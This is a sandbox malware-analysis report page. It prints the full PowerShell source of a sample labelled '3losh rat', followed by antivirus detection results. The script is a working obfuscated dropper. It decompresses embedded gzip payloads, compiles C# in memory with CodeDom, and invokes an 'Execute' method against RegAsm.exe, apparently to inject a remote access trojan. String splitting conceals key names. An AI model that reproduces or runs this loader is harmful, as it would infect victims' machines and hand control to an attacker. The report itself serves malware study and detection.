popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
#by code 3losh rat
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName Microsoft.VisualBasic
Add-Type -AssemblyName Microsoft.CSharp
Add-Type -AssemblyName System.Management
[Byte[]] $ALOSH = @(31,139,8,0,0,0,0,0,4,0,237,189,7,96,28,73,150,37,38,47,109,202,123,127,74,245,74,215,224,116,161,8,128,96,19,36,216,144,64,16,236,193,136,205,230,146,236,29,105,71,35,41,171,42,129,202,101,86,101,93,102,22,64,204,237,157,188,247,222,123,239,189,247,222,123,239,189,247,186,59,157,78,39,247,223,255,63,92,102,100,1,108,246,206,74,218,201,158,33,128,170,200,31,63,126,124,31,63,34,214,77,177,188,72,95,95,55,109,190,56,252,141,19,255,207,241,211,34,187,88,86,77,91,76,155,238,87,175,214,203,182,88,228,227,179,101,155,215,213,234,117,94,95,22,211,220,53,251,162,152,214,85,83,157,183,227,159,44,154,117,86,62,201,154,98,74,223,254,198,201,50,91,228,205,42,155,230,233,170,174,126,250,217,87,79,127,227,228,23,255,198,73,74,207,106,61,41,139,105,218,180,25,245,152,78,203,172,105,210,151,199,242,157,54,233,55,107,218,26,253,189,202,47,243,186,201,95,243,95,91,250,33,253,117,199,189,231,129,192,227,94,164,223,210,207,210,143,62,58,12,27,20,203,54,125,158,47,47,218,121,231,11,249,144,94,33,248,99,253,99,5
Function Decompress {
[CmdletBinding()]
Param (
[Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
[byte[]] $byteArray = $(Throw("-byteArray is required"))
Process {
$input = New-Object System.IO.MemoryStream( , $byteArray )
$output = New-Object System.IO.MemoryStream
$gzipStream = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress)
$gzipStream.CopyTo( $output )
$gzipStream.Close()
$input.Close()
[byte[]] $byteOutArray = $output.ToArray()
return $byteOutArray
function CodeDom([Byte[]] $BB, [String] $TP, [String] $MT) {
$dictionary = new-object 'System.Collections.Generic.Dictionary[[string],[string]]'
$hello = "Com<><><><><><><".Replace("<><><><><><><","pilerVersion")
$v4 = "v4.0"
$dictionary.Add($hello, $v4)
$CsharpCompiler = New-Object Microsoft.CSharp.CSharpCodeProvider($dictionary)
$CompilerParametres = New-Object System.CodeDom.Compiler.CompilerParameters
$v1 = "Sys@@@".Replace("@@@","tem.dll")
$CompilerParametres.ReferencedAssemblies.Add($v1)
$CompilerParametres.ReferencedAssemblies.Add("System.!@!$^^%^%**&*&*$$%$%$".Replace("!@!$^^%^%**&*&*$$%$%$","Management.dll"))
$CompilerParametres.ReferencedAssemblies.Add("System.Windows.Forms.dll")
$CompilerParametres.ReferencedAssemblies.Add("mscorlib.dll")
$CompilerParametres.ReferencedAssemblies.Add("Microsoft.VisualBasic.dll")
$CompilerParametres.IncludeDebugInformation = $false
$CompilerParametres.GenerateExecutable = $false
$CompilerParametres.GenerateInMemory = $true
$CompilerParametres.CompilerOptions += "/platform:X86 /unsafe /target:library"
$BB = Decompress($BB)
[System.CodeDom.Compiler.CompilerResults] $CompilerResults = $CsharpCompiler.CompileAssemblyFromSource($CompilerParametres, [System.Text.Encoding]::Default.GetString($BB))
[Type] $T = $CompilerResults.CompiledAssembly.GetType($TP)
[Byte[]] $Bytes = Decompress(@(31,139,8,0,0,0,0,0,4,0,156,61,7,92,19,73,247,73,8,73,8,53,4,18,154,240,20,193,200,218,235,218,177,96,63,245,44,39,172,138,46,234,217,141,138,29,177,247,222,176,247,179,247,222,187,158,189,157,103,87,176,215,179,247,6,254,223,155,217,64,240,188,251,254,223,231,143,117,119,103,102,103,222,123,243,230,181,41,249,73,154,168,114,81,169,84,90,188,190,125,83,169,182,171,248,191,104,213,127,254,55,16,47,175,176,157,94,170,205,110,167,115,110,87,215,62,157,179,97,219,118,137,208,165,155,189,77,55,185,19,180,148,59,119,182,119,135,132,214,208,173,71,103,104,215,25,170,212,109,0,157,236,173,90,23,240,244,52,230,86,234,168,23,163,82,213,86,187,168,110,55,252,69,118,212,123,75,165,81,187,171,13,42,213,61,124,209,241,180,242,46,106,149,10,240,1,212,28,58,122,214,112,184,85,170,172,187,170,133,154,165,171,88,118,244,48,149,202,135,253,101,221,51,111,236,223,61,141,90,213,88,197,235,157,163,249,1,146,209,106,149,199,255,131,22,127,251,135,240,25,156,94,13,248,94,221,233,189,64,247,214,189,187,2
$nan = "R"+"e"+"g"+"A"+"s"+"m"+"."+"e"+"x"+"e"
[String] $MyPt = [System.IO.Path]::Combine([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory(),$nan)
[Object[]] $Params=@($MyPt.Replace("F"+"r"+"a"+"m"+"e"+"w"+"or"+"k"+"6"+"4","F"+"r"+"a"+"mew"+"o"+"r"+"k") ,$Bytes)
return $T.GetMethod($MT).Invoke($null, $Params)
} catch { }
[System.Threading.Thread]::Sleep(1000)
$xx = "p"+"r"+"o"+"j"+"F"+"U"+"D"+"."+"P"+"A"
$tata = "E"+"x"+"e"+"c"+"u"+"t"+"e"
CodeDom $ALOSH ($xx) ($tata)
#by code 3losh rat
Antivirus Signature
Bkav Clean
Lionic Clean
DrWeb PowerShell.Packed.50
MicroWorld-eScan Clean
FireEye Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
Cyren Clean
Symantec Clean
ESET-NOD32 PowerShell/TrojanDropper.Agent.NO
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
ClamAV Clean
Kaspersky HEUR:Trojan.PowerShell.Invoker.gen
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Ad-Aware Clean
Sophos Clean
Comodo Clean
F-Secure Clean
Baidu Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition PS/Agent.eo
CMC Clean
Emsisoft Clean
Ikarus Trojan-Dropper.PowerShell.Agent
GData Clean
Jiangmin Clean
Avira VBS/Agent.PRG
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.PowerShell.Invoker.gen
Microsoft Clean
Cynet Malicious (score: 99)
AhnLab-V3 Clean
McAfee PS/Agent.eo
MAX Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet PowerShell/Agent.NO!tr
AVG Script:SNH-gen [Trj]
Panda Clean
No IRMA results available.